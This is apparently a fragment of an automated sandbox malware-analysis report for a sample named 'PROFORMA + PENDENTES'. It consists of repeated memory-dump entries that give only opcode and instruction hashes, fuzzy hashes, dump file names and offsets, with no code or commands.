                                              • Opcode ID: 2c7d6f348368d185ffc5bff7facf434eecd02c8884c591da510535f268e76213
                                              • Instruction ID: 1b8e0772e769f10aed4e4a290c7849a80f350193a8d6dcb59e513f95b5b9e7cb
                                              • Opcode Fuzzy Hash: 2c7d6f348368d185ffc5bff7facf434eecd02c8884c591da510535f268e76213
                                              • Instruction Fuzzy Hash: 3122DC7590025ACFDB64EF64EC94A9DBBB2FF88301F1085A9D409A7368EB305D85DF80
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 934f58c9c9ffb53e8b9a53dd67c3100ee7d5f86c46c93ee4a11f82a2a0d6dc31
                                              • Instruction ID: 29f8381b4487fd82c11896fdf13f1238b2ce6ce434b70f67ddb351f4716806e5
                                              • Opcode Fuzzy Hash: 934f58c9c9ffb53e8b9a53dd67c3100ee7d5f86c46c93ee4a11f82a2a0d6dc31
                                              • Instruction Fuzzy Hash: 6D22DB7590025ACFDB64EF64EC94A9DB7B2FF88701F1085A9D409A7368EB306D85DF80
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa68395ca9aa3ad27f99944cf4a5d6eaa5cf1f0918ff19fe1934cf9fef412964
                                              • Instruction ID: 74f4d5913f7f15aa35315ce0649b4b456a6599bd8437b68bae48e88c5121ab58
                                              • Opcode Fuzzy Hash: aa68395ca9aa3ad27f99944cf4a5d6eaa5cf1f0918ff19fe1934cf9fef412964
                                              • Instruction Fuzzy Hash: CCB1D2317046588FDB259F78C854B7A7BE2AF89B60F244529EA06CB3A1DF74CC41E790
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8cde49946bddcab8b730c13c5821289a8779bdc8abdc928920779937aeaa529
                                              • Instruction ID: 39d21176066be6ab942b6c98b16f5728fc8274c8f1cb4e4b9d6c92c1600e4d80
                                              • Opcode Fuzzy Hash: b8cde49946bddcab8b730c13c5821289a8779bdc8abdc928920779937aeaa529
                                              • Instruction Fuzzy Hash: 98817F31A05A098FCB14CFA9C888A7DBBB2BF89B11B258169D706EB371D731DD41DB50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 745155d6465f802adcd6a5c83d68097ef4d9f544c9a767109234024e5fbf1368
                                              • Instruction ID: 223810bbd8d0e6ceed669ea2e7753d5ba5f1a9f509d037cabfcaef8762e7a882
                                              • Opcode Fuzzy Hash: 745155d6465f802adcd6a5c83d68097ef4d9f544c9a767109234024e5fbf1368
                                              • Instruction Fuzzy Hash: C8713C34B046098FCB65EF28C888A79BBE6AF49710F5900A9E605DB371DB70DC41DB90
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e828dca1be2fc2bfbda109d42255da0f64dcad01af9ec92d1b4bcc5d887284c
                                              • Instruction ID: 4cea8f44f758d1abf8d02235389f5a99ef3d78f622ee39cfcac561d6fe0f919f
                                              • Opcode Fuzzy Hash: 9e828dca1be2fc2bfbda109d42255da0f64dcad01af9ec92d1b4bcc5d887284c
                                              • Instruction Fuzzy Hash: A351BE3082174B8FC3342FA0E9BC16ABBA1FF1F7277956D50E20E850398B746489DB60
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4fc98b980808060d4e9e559466de6a7e926f752e8ac8566affef9658e77b9d06
                                              • Instruction ID: f87aa0a7a5a58c15d37717b9c75174722892d6346900ccfc1440a77662b408c8
                                              • Opcode Fuzzy Hash: 4fc98b980808060d4e9e559466de6a7e926f752e8ac8566affef9658e77b9d06
                                              • Instruction Fuzzy Hash: 2751AF3082170BCFD3742FA0E9BC16ABBA5FB0F7277916C10E10E850398B706485DB64
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70a6d460fd40da00807cf246b58f027944e585c2e219e72c433ce6fad0a38cd5
                                              • Instruction ID: b21c2cf9958cbd6e125bcc58a944a173a47a7422b2905c05991cb840c9af58ce
                                              • Opcode Fuzzy Hash: 70a6d460fd40da00807cf246b58f027944e585c2e219e72c433ce6fad0a38cd5
                                              • Instruction Fuzzy Hash: 5451E475E01248CFCB08DFA9D8909ADBBF2FF89310B248469E805BB324DB35A845DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8cf4fdb1a11fad533b29f2576e208890fdede900dca0f547d9e8ea5f7ba5cbd9
                                              • Instruction ID: 27aa518e9e3a158db929bd333cf80fd87df04066f88b5820ea200bd496fa8744
                                              • Opcode Fuzzy Hash: 8cf4fdb1a11fad533b29f2576e208890fdede900dca0f547d9e8ea5f7ba5cbd9
                                              • Instruction Fuzzy Hash: 15519574E01218DFDB58DFA9D9849DDBBF2BF89300F248169E819AB365DB30A941CF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f4bd64d8dc9836bac6d3f4aa159913557913794693c4d7360cbf966efbbb45d
                                              • Instruction ID: e488f1c9bad7b322efdf857725f1c37134efc3d50ac803a7f4a8f61f3729fb17
                                              • Opcode Fuzzy Hash: 0f4bd64d8dc9836bac6d3f4aa159913557913794693c4d7360cbf966efbbb45d
                                              • Instruction Fuzzy Hash: E851B175E01248CFCB08DFA9D8909ADBBB2FF89310B208469E805BB324DB35A945DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4c02f6d7c0b8fa3ade00277568f1e91735575c671de11410df1d5cf1b97ef8d
                                              • Instruction ID: 56a6d7d9ba4302e7bb3ba0a1a8b0b5ac8fd919ff6b058d02e84c1c88dbe8b0d8
                                              • Opcode Fuzzy Hash: a4c02f6d7c0b8fa3ade00277568f1e91735575c671de11410df1d5cf1b97ef8d
                                              • Instruction Fuzzy Hash: CC519031A0824DDFCF16CFA4D844BADBBB2AF89310F148155EA119B2B1D3B4D954EB50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 30953331fdea5c36659c8a9c1e7a4bab917bfd0a0974959e67fdc5873b23fcc4
                                              • Instruction ID: e2e9b65e5ad08357a2b08726b67a42ef72adddaa4f7dc8b14700eb31fd807e52
                                              • Opcode Fuzzy Hash: 30953331fdea5c36659c8a9c1e7a4bab917bfd0a0974959e67fdc5873b23fcc4
                                              • Instruction Fuzzy Hash: 7941F535B003549FDB25AF68D814ABE7BB6AFC9320F248169D506D77A1CE348C46CB91
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75724fec92617066259636a76f8e92075405d1bcf6a193f3915e7932bc7fa41a
                                              • Instruction ID: 899cdc6d9b6669baffa5fa45c1bf4b42c7723db375309e79f5a33b8cb31c0f5a
                                              • Opcode Fuzzy Hash: 75724fec92617066259636a76f8e92075405d1bcf6a193f3915e7932bc7fa41a
                                              • Instruction Fuzzy Hash: E831F972F0032D8BDF19DA66599433E65D6AFC4760F18403DDA16D33A0DF74CD44A255
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 342c8d3f545c1aaa75c464fdf0bda928e127f62e13004e864389a1c9e2882cef
                                              • Instruction ID: 0ac55869bff18797018472e659b67473cc1ebaca6dbfc6edffca9632030e19b7
                                              • Opcode Fuzzy Hash: 342c8d3f545c1aaa75c464fdf0bda928e127f62e13004e864389a1c9e2882cef
                                              • Instruction Fuzzy Hash: 6F318D3160011A9FCB159F64D854ABF3BA2FF48321F504425FE1987364DB38DDA1EBA0
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e58fbe8b77b9944bee3a714d9bc66d9e7a55cb2f5a5de49b73d5a17ff722077d
                                              • Instruction ID: 16cc1c0f3354f2d504ca4151b4c5b61e828ea4915b982d0de833e5d2e4f45228
                                              • Opcode Fuzzy Hash: e58fbe8b77b9944bee3a714d9bc66d9e7a55cb2f5a5de49b73d5a17ff722077d
                                              • Instruction Fuzzy Hash: E821C73671C3188BEB25773A8C54A39BB979FD9724B1840B9D602CB775EE288C41F391
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2954a88a70205be31ce3e41fa3cd1c6a6db44f6604e759af35aabb5cb7c5502c
                                              • Instruction ID: cdf7cf808196e81d7132d7f0f30ef765b37cfeffdd115156cea70b9d81acf087
                                              • Opcode Fuzzy Hash: 2954a88a70205be31ce3e41fa3cd1c6a6db44f6604e759af35aabb5cb7c5502c
                                              • Instruction Fuzzy Hash: 9731A470E006098FCB14CF6DC8849BEBBB2BF85360B158169E51A973B1CB74DC42CB91
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c03669f371d1bc5fd7ffaca9c029538a925ef268e6419703e135bdae4606d18
                                              • Instruction ID: e29297a5190db84505e79e83f1e62089fcca908fd244c10977893d61f786b8c0
                                              • Opcode Fuzzy Hash: 7c03669f371d1bc5fd7ffaca9c029538a925ef268e6419703e135bdae4606d18
                                              • Instruction Fuzzy Hash: DC21B83671831847EB2436268C54B7AB6979FD8B24F144079D602CB774EE29CC81B390
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8739d2f63a3a772473dbb5f4fe6ecfcda92ded193be1bd51c466294c8d840483
                                              • Instruction ID: 1516b49c8f797935f6e0a032d3d893e0af0f78963be14232b910d5bc52fe3aff
                                              • Opcode Fuzzy Hash: 8739d2f63a3a772473dbb5f4fe6ecfcda92ded193be1bd51c466294c8d840483
                                              • Instruction Fuzzy Hash: DF21A132A00148AFCF54DF78C8509BE7BB5EF98760B10C419D9199B390DB31EE41DBA1
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 411dbddc83d8e1385c4b53d2d5c958875fdd6ab78de495f53ae9b27740858510
                                              • Instruction ID: 189a4ddc93785b610225d1a92ee2a19bf1de2defc9586f55d2b78bf1342b8590
                                              • Opcode Fuzzy Hash: 411dbddc83d8e1385c4b53d2d5c958875fdd6ab78de495f53ae9b27740858510
                                              • Instruction Fuzzy Hash: B121F531701A258FC3269B69C89453FBB62EF89B2071441A9EA06CB375CF34DC02D7D0
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1627641029.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_f4d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 791008042b465a86b42164f1bfed072af8cb0d0d41ac23905fdb13ad355f0ba7
                                              • Instruction ID: 07e17e0d558d80b2b609468e33a989c7a11d2c8def59383a3a17f57309dadea9
                                              • Opcode Fuzzy Hash: 791008042b465a86b42164f1bfed072af8cb0d0d41ac23905fdb13ad355f0ba7
                                              • Instruction Fuzzy Hash: 382103B2904204DFDB15DF10D9C0F26BF65FB98328F288569EC090A256C736D856EAA2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5624be191592fe79b5408e0ec803222793e2c5df41a177a0d9882360f42a0a5
                                              • Instruction ID: ba7ac2a7f8b7fc56983904eadba07bcd6894cb72d1a9c4fbb21a4c5c4611b3c9
                                              • Opcode Fuzzy Hash: b5624be191592fe79b5408e0ec803222793e2c5df41a177a0d9882360f42a0a5
                                              • Instruction Fuzzy Hash: 95212531C102598ECB01EFE8D8146ECFBB1FF4A311F109629E555772A4EB306A5ADB90
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3d6f0dff7feedec63cbfb88a5a060ac78cbea8aee92dfdea962ddc3ad5b3a079
                                              • Instruction ID: 4b6678aa0cb5c353d40b4c381b4ad215b1f481a85eae15d8975a6a91c3b28a7e
                                              • Opcode Fuzzy Hash: 3d6f0dff7feedec63cbfb88a5a060ac78cbea8aee92dfdea962ddc3ad5b3a079
                                              • Instruction Fuzzy Hash: 00213835A01249CFDB09DFB4D851AEDBBB2BF8A304F105868C815733A5CB359946CF25
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5caedb5030d4505e4c74a1d1cfb79653f16ec23e55c7837598ca5d6c4ffc08b
                                              • Instruction ID: 962d9d38adbf14a12e04a94ec31a3df3832af46648940648fc7ba2a173bfa5fb
                                              • Opcode Fuzzy Hash: e5caedb5030d4505e4c74a1d1cfb79653f16ec23e55c7837598ca5d6c4ffc08b
                                              • Instruction Fuzzy Hash: A3117F32E0434D9FCF019BF89C004EEBB30FF8A320B254796D562B7150EA311906C790
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 697d626686c3d6ebfe008e779d68a202f4924eb8097c895ac0909997c04357c2
                                              • Instruction ID: efa660ffef60f93e46d874ba61bbff3c5534998c2c524731b7860f4d78497a83
                                              • Opcode Fuzzy Hash: 697d626686c3d6ebfe008e779d68a202f4924eb8097c895ac0909997c04357c2
                                              • Instruction Fuzzy Hash: 8331A579E01348CFCB44EFA8E5948ADBBB2FF49311B204469E819AB324D735AD45DF50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac0c3dc6fa644d67a3f94509d5b398473ad30c9e8231b0fd98dd6e6f909a515a
                                              • Instruction ID: a2fa9b31d0d2deee01826a612b535d1283b8ab6c37363b6d9245d112610b1023
                                              • Opcode Fuzzy Hash: ac0c3dc6fa644d67a3f94509d5b398473ad30c9e8231b0fd98dd6e6f909a515a
                                              • Instruction Fuzzy Hash: 0021D431A042599FCB259F68D85467B3FA2FF84324F104469F9058B365CB38DD51DBA0
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b77cd51cb50c0eddeb705501e0d12456daf9e8a71c27726f8332ccf05ea6b1f1
                                              • Instruction ID: f1d01484acf00a0a18b826a6f9b24da86130f12ba086b97b915176257f38e45a
                                              • Opcode Fuzzy Hash: b77cd51cb50c0eddeb705501e0d12456daf9e8a71c27726f8332ccf05ea6b1f1
                                              • Instruction Fuzzy Hash: F52106359012088BCB09DBB4D850AEDB7B2FF8A304F105428C805733A4DB35A946CF65
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4cab39eae2ac2341559f22b9c515b5f34965e27a7d76ad2541c83516a52091a
                                              • Instruction ID: eb56cb3e63091413e982a2913e13f5cf9dc61882ca237cc3b9ba6083ae15ac71
                                              • Opcode Fuzzy Hash: c4cab39eae2ac2341559f22b9c515b5f34965e27a7d76ad2541c83516a52091a
                                              • Instruction Fuzzy Hash: 3E11C2317019259FD7259A2AC89493EB7A6BFC4B6171441A9EA06CB374DF34DC0297D0
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1627641029.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_f4d000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                              • Instruction ID: fce65d292705c773359984563ef7cec63e3635e941c6752efa21ebfb0e2a3590
                                              • Opcode Fuzzy Hash: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                              • Instruction Fuzzy Hash: 3C11B176904240CFCB15CF10D5C4B16BF72FB94328F28C5A9DC090B656C336D85ADBA1
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96365311e583f8b01c1811c08bf94672febf1f0449fb748ab409da05008c18d6
                                              • Instruction ID: 7df8592b32aba09df79a1a1af65eebcb584652d5d2ef6c683509770af1e1f265
                                              • Opcode Fuzzy Hash: 96365311e583f8b01c1811c08bf94672febf1f0449fb748ab409da05008c18d6
                                              • Instruction Fuzzy Hash: 1F2100B4C0424A8FDB51EFA8D8555EDBFF0BF0A300F5041AAD905F7264EB305A85CBA1
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 44eaaa5093565a81d4932f799ed139489ba63bdaef45f4e3066c6bc33d4ff297
                                              • Instruction ID: 32f69230eb6a824ef2cd6d7724e8fe037acb212553d3db7c76725f43f8b4e1d5
                                              • Opcode Fuzzy Hash: 44eaaa5093565a81d4932f799ed139489ba63bdaef45f4e3066c6bc33d4ff297
                                              • Instruction Fuzzy Hash: 1221D075D0460E8FCB20EFA8D8545EEBFF0BF4A310F50416AE905B7264EB305A85DBA1
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79e7a10ece0dc3a26680a019416a7077b109980c08e758cba97e55b68fe0ccf2
                                              • Instruction ID: 12f22eadcac88a253f2ea2ffca5948887e8ffa9c97a534d48aab6654ee7f962c
                                              • Opcode Fuzzy Hash: 79e7a10ece0dc3a26680a019416a7077b109980c08e758cba97e55b68fe0ccf2
                                              • Instruction Fuzzy Hash: C6012872B041185FDB168E689C107FE3FA7DFC9751B68806AFA14CB2A4CE358C52E790
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 627b7f6676ac507f01320d614e6d5e4711d596339f2fdab7fd4b7e3a3ef277ad
                                              • Instruction ID: 6a5fea126f7d49ea198b3f939d478c74cf6759f1e1cd46ebcdf2bbf8b527e7c8
                                              • Opcode Fuzzy Hash: 627b7f6676ac507f01320d614e6d5e4711d596339f2fdab7fd4b7e3a3ef277ad
                                              • Instruction Fuzzy Hash: F1E09231D643968BCB029B7898014EEBF74EED3310B9A82E7C4A16B482E770195AC771
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b4efc10991eafdf583158c6e4b09f2babf846799a3c5be4cd89cc8ddabfb70f
                                              • Instruction ID: c8304c53151226d54f0c9d3a3f5e6c8c03e030300ef8879c3aee508963828839
                                              • Opcode Fuzzy Hash: 3b4efc10991eafdf583158c6e4b09f2babf846799a3c5be4cd89cc8ddabfb70f
                                              • Instruction Fuzzy Hash: 3BD05B31D2022A57CB00E7A5DC044DFFB38EFD6721B514666D55437140FB702659C6F1
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                              • Instruction ID: 9f6991ec6ae576b23c6bc5e6d9462dcb18e40c161f65000038686e65a8bbffbc
                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                              • Instruction Fuzzy Hash: 35C0123350C1282A9624104E7C40AB7674CC6C17F49250137F61C9721098425C4111A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21e71a2b10f9dae22ce8c1cb9c2ca926a08b65b2e9bd12d523c20137cc6594b4
                                              • Instruction ID: 6e5551a88a637f3bb08d0665389632b6ab857988798558ff692d4e0ed5e53614
                                              • Opcode Fuzzy Hash: 21e71a2b10f9dae22ce8c1cb9c2ca926a08b65b2e9bd12d523c20137cc6594b4
                                              • Instruction Fuzzy Hash: E2D0677AB01008AFDB149F98E850DDDF7B6FB9C221B548116E915A3264C6319961DB50
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db4b10e6d0c40ca954bebf59f2b256205dba44624020e509ea7d4301f4438d5c
                                              • Instruction ID: 3dc4f8863325008ddeddd6f0e25ffd80da4560f113ed735c5ce6fba98673fb46
                                              • Opcode Fuzzy Hash: db4b10e6d0c40ca954bebf59f2b256205dba44624020e509ea7d4301f4438d5c
                                              • Instruction Fuzzy Hash: 12D02B309043454BC716FB30FC154683B357BC0204B5049DAE8014A51AEB7C4D064B52
                                              Memory Dump Source
